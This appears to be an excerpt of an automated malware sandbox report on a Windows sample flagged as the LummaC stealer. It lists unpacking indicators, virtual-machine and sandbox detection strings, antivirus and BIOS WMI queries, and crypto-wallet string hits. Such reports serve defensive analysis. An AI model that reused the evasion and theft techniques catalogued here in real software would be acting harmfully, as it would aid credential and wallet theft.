                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: WyPb2uVZ1P.exeStatic file information: File size 16933008 > 1048576
                    Source: WyPb2uVZ1P.exeStatic PE information: Raw size of .reloc is bigger than: 0x100000 < 0x2a4400
                    Source: WyPb2uVZ1P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: WyPb2uVZ1P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: WyPb2uVZ1P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: WyPb2uVZ1P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: WyPb2uVZ1P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: WyPb2uVZ1P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: WyPb2uVZ1P.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: WyPb2uVZ1P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: E:\Adlice\UpdateChecker\RelWithDebInfo\updater.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: 2C:\VisualStudio\Projects\RebootExec\Release\RebootExec.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2370757567.0000000006CA0000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004C28000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: WyPb2uVZ1P.exe
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2370757567.0000000006CA0000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004C28000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\VisualStudio\Projects\RebootExec\Release\RebootExec.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: _CHAR__ANY__RANGE__CLASS__WORD_CHAR__NON_WORD_CHAR__SPACE__NON_SPACE__DIGIT__NON_DIGIT__WORD_BOUNDARY__NON_WORD_BOUNDARY_'*''?''+''^''$''.'realternativeconcatenationcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501Load file into cachecrypto\x509\by_file.cunspecified certificate verification errorunable to get issuer certificateunable to get certificate CRLunable to decrypt certificate's signatureunable to decrypt CRL's signatureunable to decode issuer public keycertificate signature failureCRL signature failurecertificate is not yet validcertificate has expiredCRL is not yet validCRL has expiredformat error in certificate's notBefore fieldformat error in certificate's notAfter fieldformat error in CRL's lastUpdate fieldformat error in CRL's nextUpdate fieldself signed certificateself signed certificate in certificate chainunable to get local issuer certificateunable to verify the first certificatecertificate chain too longcertificate revokedinvalid CA certificatepath length constraint exceededunsupported certificate purposecertificate not trustedcertificate rejectedsubject issuer mismatchauthority and subject key identifier mismatchauthority and issuer serial number mismatchkey usage does not include certificate signingunable to get CRL issuer certificateunhandled critical extensionkey usage does not include CRL signingunhandled critical CRL extensioninvalid non-CA certificate (has CA markings)proxy path length constraint exceededkey usage does not include digital signatureproxy certificates not allowed, please set the appropriate flaginvalid or inconsistent certificate extensioninvalid or inconsistent certificate policy extensionno explicit policyDifferent CRL scopeUnsupported extension featureRFC 3779 resource not subset of parent's resourcespermitted subtree violationexcluded subtree violationname constraints minimum and maximum not supportedapplication verification failureunsupported name constraint typeunsupported or invalid name constraint syntaxunsupported or invalid name syntaxCRL path validation errorPath LoopSuite B: certificate version invalidSuite B: invalid public key algorithmSuite B: invalid ECC curveSuite B: invalid signature algorithmSuite B: curve not allowed for this LOSSuite B: cannot sign P-384 with P-256Hostname mismatchEmail address mismatchIP address mismatchNo matching DANE TLSA recordsEE certificate key too weakCA certificate key too weakCA signature digest algorithm too weakInvalid certificate verification contextIssuer certificate lookup errorCertificate Transparency required, but no valid SCTs foundproxy subject name violationOCSP verification neededOCSP verification failedOCSP unknown certunknown certificate verification errorcrypto\rand\randfile.cFilename=RANDFILEHOMEUSERPROFILESYSTEMROOT.rndcrypto\ocsp\ocsp_cl.ch7. source: WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: WyPb2uVZ1P.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: WyPb2uVZ1P.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: WyPb2uVZ1P.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: WyPb2uVZ1P.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.WyPb2uVZ1P.exe.56842b8.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.WyPb2uVZ1P.exe.56842b8.11.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.WyPb2uVZ1P.exe.56842b8.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.WyPb2uVZ1P.exe.56842b8.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.WyPb2uVZ1P.exe.56842b8.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.WyPb2uVZ1P.exe.6b40000.18.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.WyPb2uVZ1P.exe.6b40000.18.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.WyPb2uVZ1P.exe.6b40000.18.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.WyPb2uVZ1P.exe.6b40000.18.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.WyPb2uVZ1P.exe.6b40000.18.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, Rvdoqpqjgq.cs.Net Code: Pmxfrmbm System.AppDomain.Load(byte[])
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.WyPb2uVZ1P.exe.558b478.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WyPb2uVZ1P.exe.6a40000.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WyPb2uVZ1P.exe.6a40000.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WyPb2uVZ1P.exe.558b478.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WyPb2uVZ1P.exe.4f91c2c.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WyPb2uVZ1P.exe.4ec57b8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WyPb2uVZ1P.exe.4f71c0c.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WyPb2uVZ1P.exe.543b858.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.WyPb2uVZ1P.exe.52ebc38.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2370106119.0000000006A40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2366742842.0000000004E2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WyPb2uVZ1P.exe PID: 984, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AE7E80 FreeLibrary,LoadLibraryW,GetProcAddress,0_2_00AE7E80
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_0310736A push es; ret 0_2_03107384
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_073843FC push esi; iretd 0_2_07384407
                    Source: 0.2.WyPb2uVZ1P.exe.6620000.15.raw.unpack, tJvkfOA65gBtA6Umufm.csHigh entropy of concatenated method names: 'C9yALMhHIL', 'SrcAKqNHDs', 'Y8RAvbq8Ym', 'PDNAuImV7m', 'kWvA5lL3iE', 'l7EAo31GYo', 'dAeA1L7Oyc', 'bM3AkTL1Bn', 'c7mAi0TB7E', 'OAUApWmL12'
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00ABB880 NetUserAdd,NetUserSetInfo,NetUserSetInfo,LogonUserW,LoadUserProfileW,UnloadUserProfile,NetUserSetInfo,FreeLibrary,0_2_00ABB880
                    Source: WyPb2uVZ1P.exeBinary or memory string: 66MHz CapableSlot type: AGPSlot type: AGP 2XSlot type: AGP 4XSlot type: PCI-XSlot type: AGP 8XSlot type: M.2 Socket 1-DP (Mechanical Key A)Slot type: M.2 Socket 1 - SD(Mechanical Key E)Slot type: M.2 Socket 2 (Mechanical Key B)Slot type: M.2 Socket 3 (Mechanical Key M)Slot type: MXM Type ISlot type: MXM Type IISlot type: MXM Type III (standard connector)Slot type: MXM Type III (HE connector)Slot type: MXM Type IVSlot type: MXM 3.0 Type ASlot type: MXM 3.0 Type BSlot type: PCI Express Gen 2 SFF - 8639Slot type: PCI Express Gen 3 SFF - 8639Slot type: PCI Express Mini 52 - pin (CEM spec. 2.0) with bottom-side keep-outsSlot type: PCI Express Mini 52-pin (CEM spec. 2.0) without bottom-side keep-outsSlot type: PCI Express Mini 76 - pin (CEM spec. 2.0). Corresponds to Display - Mini cardSlot type: PC-98/C20Slot type: PC-98/C24Slot type: PC-98/ESlot type: PC-98/Local BusSlot type: PC-98/CardSlot type: PCI ExpressSlot type: PCI Express x1Slot type: PCI Express x2Slot type: PCI Express x4Slot type: PCI Express x8Slot type: PCI Express x16Slot type: PCI Express Gen 2Slot type: PCI Express Gen 2 x1Slot type: PCI Express Gen 2 x2Slot type: PCI Express Gen 2 x4Slot type: PCI Express Gen 2 x8Slot type: PCI Express Gen 2 x16Slot type: PCI Express Gen 3Slot type: PCI Express Gen 3 x1Slot type: PCI Express Gen 3 x2Slot type: PCI Express Gen 3 x4Slot type: PCI Express Gen 3 x8Slot type: PCI Express Gen 3 x16Slot type: UnknownIn Use: YES In Use: NO Name: AcerPackard bell0SNID: Dell0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-Service tag: EnumSystemFirmwareTablesKernel32.dllGetSystemFirmwareTableKernel32.dllSelect Vendor, Name, IdentifyingNumber from Win32_ComputerSystemProductROOT\CIMV2VendorTo be filled Name IdentifyingNumberSelect Manufacturer, Product, SerialNumber, Version from Win32_BaseBoardManufacturerTo be filled Product Version SerialNumberSelect SerialNumber from Win32_BIOSSerialNumberRoot\CIMV2Select * From Win32_PrinterCancelAllJobsReturnValue-ContinueRepair-DesktopWatermarkConfig/UpdateVT-DesktopWatermark-ImmunizeConfig/MRSAPP/apfHKLM\SOFTWARE\Carifred\UVK - Ultra virus killerRebootActionsReset_CHKDSK-RestoreBoot/StopResetApps-StopResetApps/UpdateFromZip/PostUpdateActions\UVKRebootExecLog.txtReset_UDS-ReplaceFile-SReplaceFile-SReplaceFile-ExpandFile-SExpandFile-SExpandFile\UVK_en.exe HKLM\SYSTEM\CurrentControlSet\Control\Session Managerautocheck autochk *BootExecute\cmd.exe /c chkntfs /x \boot.inioperating systems /safeboot:minimal /sos /bootlog /noguiboot /safeboot:network /sos /bootlog /noguibootoperating systems\bcdedit.exe /deletevalue {current} safeboot user...
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeMemory allocated: 3C20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeMemory allocated: 3A30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeAPI coverage: 1.0 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6692Thread sleep time: -90000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5452Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00ABEB70 PathFileExistsW,FreeLibrary,FreeLibrary,PathFileExistsW,FreeLibrary,FreeLibrary,PathFileExistsW,FindFirstFileW,FindClose,CopyFileW,GetTempPathW,PathFileExistsW,GetSystemDirectoryW,SHDefExtractIconW,GdipCreateBitmapFromHBITMAP,GdipSaveImageToFile,GdipDisposeImage,0_2_00ABEB70
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A91560 FindFirstFileW,0_2_00A91560
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A91770 FindClose,FindFirstFileW,0_2_00A91770
                    Source: WyPb2uVZ1P.exeBinary or memory string: AsyncCreateFileKBMBGBTBPBbytes%I64d %s%.2llf %sdskwipe%lu\\.\%sExtendedUnformatted%ls (0x%02X)FAT12FAT16DELL (spanning)Config/diagnosticsHidden FATHidden NTFSPMagic recoveryHidden NetWareLinux/MINIXSFS/LDM/Linux SwapNovellEZ-DriveOS/2 BMXenixUNIXScramdiskXOSL FSMINIXLinux SwapLinuxHidden LinuxNTFS volume setBSD/OSHibernationBSDMac OS-XNetBSDMac OS-X BootBSDI BSD/386 swapHidden Linux swapVMwareVMware swapLinux RAIDWinNT hidden0x%02XBasic DataUnusedSystemMSFT ReservedLDM MetadataLDM DataMSFT Recovery%c:\\.\%c:\DosDevices\%c:ABCDEFGHIJKLMNOPQRSTUVwXYZ\Device\Harddisk%d\Partition%dError: %ld
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                    Source: RegAsm.exe, 00000003.00000002.2573588665.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                    Source: WyPb2uVZ1P.exeBinary or memory string: .?AVQEmulationPaintEngine@@
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00B06246 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B06246
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AE7E80 FreeLibrary,LoadLibraryW,GetProcAddress,0_2_00AE7E80
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_03100A77 mov eax, dword ptr fs:[00000030h]0_2_03100A77
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_03100000 mov edx, dword ptr fs:[00000030h]0_2_03100000
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_031010C6 mov eax, dword ptr fs:[00000030h]0_2_031010C6
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_031010C7 mov eax, dword ptr fs:[00000030h]0_2_031010C7
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_03100E27 mov eax, dword ptr fs:[00000030h]0_2_03100E27
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00B06246 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B06246
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00ABB880 NetUserAdd,NetUserSetInfo,NetUserSetInfo,LogonUserW,LoadUserProfileW,UnloadUserProfile,NetUserSetInfo,FreeLibrary,0_2_00ABB880
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A9DE10 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,RegSetKeySecurity,LocalFree,0_2_00A9DE10
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A9D990 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00A9D990
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00AA5420 GetLocalTime,0_2_00AA5420
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeCode function: 0_2_00A9C910 ConvertStringSidToSidW,LookupAccountNameW,LocalAlloc,LookupAccountNameW,0_2_00A9C910
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Found many strings related to Crypto-Wallets (likely being stolen)
